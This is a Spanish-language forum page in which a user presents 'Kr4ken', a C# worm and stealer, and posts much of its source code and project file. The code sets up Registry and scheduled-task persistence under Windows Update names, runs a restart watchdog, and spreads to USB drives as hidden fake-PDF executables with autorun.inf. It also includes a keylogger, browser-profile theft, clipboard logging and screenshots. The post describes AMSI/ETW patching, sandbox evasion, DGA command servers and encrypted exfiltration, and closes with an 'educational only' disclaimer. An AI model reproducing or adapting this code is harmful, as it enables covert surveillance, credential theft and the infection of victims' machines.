public static string GetMachineSignature() {
try {
string cpu = "", mac = "";
using (var s = new ManagementObjectSearcher("SELECT ProcessorId FROM Win32_Processor"))
foreach (ManagementObject o in s.Get()) { cpu = o["ProcessorId"]?.ToString() ?? ""; if (!string.IsNullOrEmpty(cpu)) break; }
using (var s = new ManagementObjectSearcher("SELECT MACAddress FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True"))
foreach (ManagementObject o in s.Get()) { mac = o["MACAddress"]?.ToString() ?? ""; if (!string.IsNullOrEmpty(mac)) break; }
return string.IsNullOrEmpty(cpu) && string.IsNullOrEmpty(mac) ? Environment.MachineName : $"{cpu}_{mac}";
} catch { return Environment.MachineName; }
}
}
// ====================== PERSISTENCE ======================
private static class Persistence {
public static void EstablishMultiLayer(string path) {
try {
bool isAdmin = IsAdministrator();
using (var k = Registry.CurrentUser.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", true))
k?.SetValue($"WindowsUpdate_{Guid.NewGuid().ToString("N")[..8]}", $"\"{path}\" /hidden");
if (isAdmin)
TrySetHKLMRun(path);
CreateHighPrivScheduledTask(path);
using (var k = Registry.CurrentUser.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce", true))
k?.SetValue($"Kr4ken_Once_{Guid.NewGuid().ToString("N")[..8]}", $"\"{path}\"");
LogDiagnostic("Multi-layer persistence established");
} catch (Exception ex) { LogDiagnostic($"Persistence error: {ex.Message}"); }
}
private static bool TrySetHKLMRun(string path) {
try {
using (var k = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", true)) {
if (k != null) {
k.SetValue($"WindowsDefenderUpdate_{Guid.NewGuid().ToString("N")[..8]}", $"\"{path}\"");
return true;
}
}
} catch { }
return false;
}
private static void CreateHighPrivScheduledTask(string path) {
try {
string name = $"WindowsUpdateTask_{Guid.NewGuid().ToString("N")[..8]}";
string args = $"/Create /TN \"{name}\" /TR \"{path}\" /SC ONLOGON /RL HIGHEST /F /RU SYSTEM";
var psi = new ProcessStartInfo("schtasks.exe", args) { UseShellExecute = true, Verb = "runas", CreateNoWindow = true };
using var p = Process.Start(psi);
p?.WaitForExit(12000);
} catch { CreateNormalScheduledTask(path); }
}
private static void CreateNormalScheduledTask(string path) {
try {
string name = $"WindowsUpdateTask_{Guid.NewGuid().ToString("N")[..8]}";
string args = $"/Create /TN \"{name}\" /TR \"{path}\" /SC ONLOGON /RL HIGHEST /F";
var p = Process.Start("schtasks.exe", args);
p?.WaitForExit(8000);
} catch { }
}
public static void StartWatchdog(string path) {
Timer t = new Timer(WATCHDOG_CHECK_INTERVAL.TotalMilliseconds);
int retry = 0;
const int max = 8;
t.Elapsed += (s, e) => {
if (Process.GetProcessesByName(Path.GetFileNameWithoutExtension(path)).Length == 0) {
try {
int delay = Math.Min(2000 * (1 << retry), 45000);
Thread.Sleep(delay);
Process.Start(path);
retry = retry < max ? retry + 1 : 0;
} catch { }
}
};
t.Start();
}
}
// ====================== USB PROPAGATION ======================
private static class Propagation {
public static void InfectUSBDrives() {
foreach (var drive in DriveInfo.GetDrives().Where(d => d.DriveType == DriveType.Removable && d.IsReady)) {
try {
CreateHiddenPayloadCopies(drive.RootDirectory.FullName);
CreateAutorunInf(drive.RootDirectory.FullName);
} catch { }
}
}
private static void CreateHiddenPayloadCopies(string root) {
var names = new[] { "Annual_Report_2026", "Pending_Invoice_Q1", "Confidential_Document", "Budget_2026_Final" };
var rand = new Random();
for (int i = 0; i < 4; i++) {
string name = names[rand.Next(names.Length)] + ".pdf.exe";
string target = Path.Combine(root, name);
try {
File.Copy(malwarePath, target, true);
File.SetAttributes(target, FileAttributes.Hidden | FileAttributes.System);
} catch { }
}
}
private static void CreateAutorunInf(string root) {
string path = Path.Combine(root, "autorun.inf");
if (File.Exists(path)) return;
string content = @"[autorun]
action=Open Document
open=Annual_Report_2026.pdf.exe
icon=Annual_Report_2026.pdf.exe,0";
try {
File.WriteAllText(path, content);
File.SetAttributes(path, FileAttributes.Hidden | FileAttributes.System);
} catch { }
}
}
// ====================== PAYLOADS ======================
private static class Payloads {
public static void StartAll() {
StartKeyAndMouseHooks();
StealBrowserData();
MonitorClipboardImproved();
PeriodicScreenshots();
}
public static void StartKeyAndMouseHooks() {
keyProc = KeyLoggerCallback;
keyHook = SetWindowsHookEx(13, keyProc, GetModuleHandle(null), 0);
}
private static int KeyLoggerCallback(int nCode, IntPtr wParam, IntPtr lParam) {
if (nCode >= 0 && wParam == (IntPtr)0x0100) {
try {
int vk = Marshal.ReadInt32(lParam);
string key = GetKeyString(vk);
if (!string.IsNullOrEmpty(key)) {
lock (_bufferLock) {
_keyLogBuffer.Append(key);
if (_keyLogBuffer.Length >= 2048 || (DateTime.Now - _lastKeyLogWrite > KEYLOG_BUFFER_THRESHOLD)) {
File.AppendAllText(Path.Combine(Path.GetTempPath(), "keys.txt"), _keyLogBuffer.ToString());
_lastKeyLogWrite = DateTime.Now;
_keyLogBuffer.Clear();
}
}
}
} catch { }
}
return CallNextHookEx(keyHook, nCode, wParam, lParam);
}
private static string GetKeyString(int vkCode) {
switch (vkCode) {
case 0x0D: return "[ENTER]\r\n";
case 0x08: return "[BACK]";
case 0x09: return "[TAB]";
case 0x1B: return "[ESC]";
case 0x20: return " ";
}
if (vkCode >= 0x70 && vkCode <= 0x7B) return $"[F{vkCode - 0x6F}]";
bool shift = (GetAsyncKeyState(0x10) & 0x8000) != 0;
bool caps = Console.CapsLock;
char c = (char)vkCode;
if (char.IsLetter(c)) return (shift ^ caps) ? c.ToString().ToUpper() : c.ToString().ToLower();
if (char.IsDigit(c) && shift) {
string shifted = ")!@#$%^&*(";
return shifted[c - '0'].ToString();
}
return c.ToString();
}
public static void StealBrowserData() {
string temp = Path.Combine(Path.GetTempPath(), "browser");
Directory.CreateDirectory(temp);
try {
string chrome = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), @"Google\Chrome\User Data\Default");
if (Directory.Exists(chrome)) SafeDirectoryCopy(chrome, Path.Combine(temp, "chrome"));
string edge = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), @"Microsoft\Edge\User Data\Default");
if (Directory.Exists(edge)) SafeDirectoryCopy(edge, Path.Combine(temp, "edge"));
string firefox = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), @"Mozilla\Firefox\Profiles");
if (Directory.Exists(firefox)) SafeDirectoryCopy(firefox, Path.Combine(temp, "firefox"));
} catch { }
}
private static void SafeDirectoryCopy(string source, string dest) {
try {
Directory.CreateDirectory(dest);
foreach (string file in Directory.GetFiles(source)) {
string destFile = Path.Combine(dest, Path.GetFileName(file));
if (new FileInfo(file).Length < 10 * 1024 * 1024)
File.Copy(file, destFile, true);
}
} catch { }
}
public static void MonitorClipboardImproved() {
Timer t = new Timer(5000);
string path = Path.Combine(Path.GetTempPath(), "clipboard.txt");
t.Elapsed += (s, e) => {
try {
if (Clipboard.ContainsText())
File.AppendAllText(path, $"[{DateTime.Now:HH:mm:ss}] {Clipboard.GetText()}\n");
} catch { }
};
t.Start();
}
public static void PeriodicScreenshots() {
Timer t = new Timer(60000);
string dir = Path.Combine(Path.GetTempPath(), "screenshots");
Directory.CreateDirectory(dir);
t.Elapsed += (s, e) => {
try {
using Bitmap bmp = new(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height);
using Graphics g = Graphics.FromImage(bmp);
g.CopyFromScreen(0, 0, 0, 0, bmp.Size);
string path = Path.Combine(dir, $"scr_{DateTime.Now:yyyyMMdd_HHmmss}.jpg");
bmp.Save(path, ImageFormat.Jpeg);
} catch { }
};
t.Start();
}
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr SetWindowsHookEx(int idHook, HookProc lpfn, IntPtr hMod, uint dwThreadId);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern int CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr GetModuleHandle(string? lpModuleName);
[DllImport("user32.dll")] private static extern short GetAsyncKeyState(int vKey);
}
|
|
40
en: 19 Abril 2026, 01:41 am
|
|
Iniciado por Shyx - Último mensaje por Shyx
|
Muy buenas a todos! Os presento mi proyecto actual en C#: Kr4ken. Se trata de un malware tipo worm/stealer, diseñado para persistir en el sistema, evadir mecanismos de defensa, robar información y exfiltrarla a servidores de mando y control (C2). Flujo principal (Main)El programa sigue esta secuencia: Detecta sandbox o entornos de análisis. Genera un identificador único de la máquina. Deriva una clave de cifrado ligada al equipo. Intenta desactivar AMSI y ETW. Genera servidores C2 mediante DGA. Establece persistencia. Intenta desactivar antivirus/Defender. Se propaga por USB. Ejecuta técnicas de process hollowing. Inicia robo de datos, exfiltración y watchdog. En resumen: se oculta, se instala, roba y exfiltra datos. Componentes principales1. Anti-análisisDetecta entornos sospechosos mediante: Indicadores de VM (VMware, VirtualBox, etc.) Procesos de análisis (Wireshark, IDA, x64dbg…) Depuradores, baja entropía del sistema, anomalías temporales 2. EvasiónParcheo en memoria de amsi.dll y ntdll.dll Evita inspección (AMSI) y trazabilidad (ETW) 3. C2 y DGAGenera dominios dinámicos basados en fecha, seeds y machine ID Evita dependencia de infraestructura fija 4. CifradoPBKDF2 (SHA-256) + AES-CBC Claves derivadas de contraseña + máquina Datos exfiltrados cifrados y ligados al host 5. Process HollowingInyección en procesos legítimos (svchost, explorer…) Ejecución encubierta para evadir detección 6. PersistenciaClaves de registro (Run, RunOnce) Tareas programadas Watchdog de autorrecuperación 7. Propagación USBCopia el binario con nombres señuelo (PDF falsos) Oculta archivos y usa autorun.inf (soy un nostálgico) 8. Robo de informaciónIncluye varios módulos: Keylogger (hook global) Robo de datos de navegadores (Chrome, Edge, Firefox) Monitor del portapapeles Capturas de pantalla periódicas 9. ExfiltraciónCada ~35 minutos: Recopila datos robados Los comprime y cifra Los envía vía HTTP(S) a C2 Usa User-Agents falsos y rotación de servidores Nota: Este proyecto tiene fines exclusivamente educativos y de investigación en el ámbito de la ciberseguridad. El autor no se hace responsable del uso indebido o malintencionado que pueda realizarse del mismo.Kr4ken.csproj<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<OutputType>WinExe</OutputType>
<!-- No console -->
<TargetFramework>net8.0-windows</TargetFramework>
<UseWindowsForms>true</UseWindowsForms>
<Nullable>enable</Nullable>
<ImplicitUsings>enable</ImplicitUsings>
<!-- Further hide the executable -->
<ApplicationIcon />
<Company>Kr4ken Security</Company>
<Product>System Update Service</Product>
</PropertyGroup>
<ItemGroup>
<PackageReference Include="System.Management" Version="8.0.0" />
</ItemGroup>
</Project>
|
Páginas: 1 2 3 [ 4] 5 6 7 8 9 10 |
| |
|
